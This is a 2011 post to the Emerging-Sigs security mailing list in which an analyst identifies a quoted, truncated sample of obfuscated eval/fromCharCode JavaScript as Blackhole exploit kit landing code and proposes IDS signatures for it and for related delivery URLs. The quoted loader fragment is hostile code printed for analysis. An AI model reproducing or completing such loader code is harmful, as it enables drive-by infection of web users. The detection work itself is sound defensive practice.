[Emerging-Sigs] Three Proposed Signatures for Unknown Exploit Kit (No current ET coverage)

Chris Wakelin c.d.wakelin at reading.ac.uk
Tue Sep 13 11:24:16 EDT 2011


On 13/09/2011 16:02, Nathan wrote:
> <html><body><script>
> a=document.createElement('div');
> try{{}['qwewqr']();}catch(q){a.innerHTML=- -+new Object(22);}
> if (typeof a.fwevfeerhrwe === 'undefined'){c='f';cc='e';}
> z=[a['innerHTML']];q=+z;
> e=window[cc+'val'];e(String[c+'romChar'+'Co'+'de'](50*2,q+89,49.5*2,q+95,54.5*2,q+79,55*2,q+94,23*2,q+97,57*2,q+83,58*2,q+79,20*2,q+17,30*2,q+77,50.5*2,q+88,58*2,q+79,57*2,q+40,30*2,q+82,24.5*2,q+40,40*2,q+86,50.5*2,q+75,57.5*2,q+79,16*2,q+97,48.5*2,q+83,58*2,q+10,56*2,q+75,51.5*2,q+79,16*2,q+83,57.5*2,q+10,54*2,q+89,48.5*2,q+78,52.5*2,q+88,51.5*2,q+24,23*2,q+24,30*2,q+25,52*2,q+27,31*2,q+38,23.5*2,q+77,50.5*2,q+88,58*2,q+79,57*2,q+40,30*2,q+82,57*2,q+40,19.5*2,q+19,29.5*2,q+-9,5*2,q+-9,5*2,q+80,58.5*2,q+88,49.5*2,q+94,52.5*2,q+89,55*2,q+10,50.5*2,q+88,50*2,q+73,57*2,q+79,50*2,q+83,57*2,q+79,49.5*2,q+94,20*2,q+19,16*2,q+101,62.5*2,q+-9,5*2,q+96,48.5*2,q+92,16*2,q+84,59*2,q+79,57*2,q+10,30.5*2,q+10,45.5*2,q+26,22*2,q+10,24*2,q+22,16*2,q+26,22*2,q+10,24*2,q+71,22*2,q+-9,5*2,q+10,16*2,q+10,16*2,q+90,50*2,q+80,59*2,q+79,57*2,q+10,30.5*2,q+10,45.5*2,q+26,22*2,q+10,24*2,q+22,16*2,q+26,22*2,q+10,24*2,q+71,22*2,q+-9,5*2,q+10,16*2,q+{SNIPPED
> BY NATHAN}
> 

That looks like the latest version of our usual obfuscated Javascript
associated with the Blackhole kit. I was about to suggest another
revision to sig: 2013313 after testing it for a couple of days:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET TROJAN Obfuscated
Javascript Often Used in the Blackhole Exploit Kit 3";
flow:established,from_server; content:"Content-Type|3a 20|text/html";
content:"|0d 0a|<html><body>"; within:500; content:"<script>|0d 0a 09 09
09|"; fast_pattern; within:500;
pcre:"/([a-z$+-]{0,4}[0-9.*]+[a-z$+-]{0,4},){24}/R";
classtype:trojan-activity; sid:2013313; rev:5;)

There are a couple of URLs we could sig, but they change from time to
time. E.g. the Java exploit is often delivered as "worms.jar" (used to
be [Gg]ames.jar, mario.jar etc. - see sigs 2013024, 2011324, 2011326)
and I've seen alot of "main.php?page=[0-9a-f]{16}" recently (as opposed
to ".php?tp=[0-9a-f]{16}") for the obfuscated Javascript page:-

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"RDG Driveby Download
Secondary Request #4"; flow:established,to_server;
content:"main.php?page="; http_uri; pcre:"/[a-f0-9]{16}$/U";
classtype:trojan-activity; sid:xxxxx; rev:1;)

Best Wishes,
Chris

-- 
--+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+-
Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 8439
Whiteknights, Reading, RG6 2AF, UK              Fax: +44 (0)118 975 3094


More information about the Emerging-sigs mailing list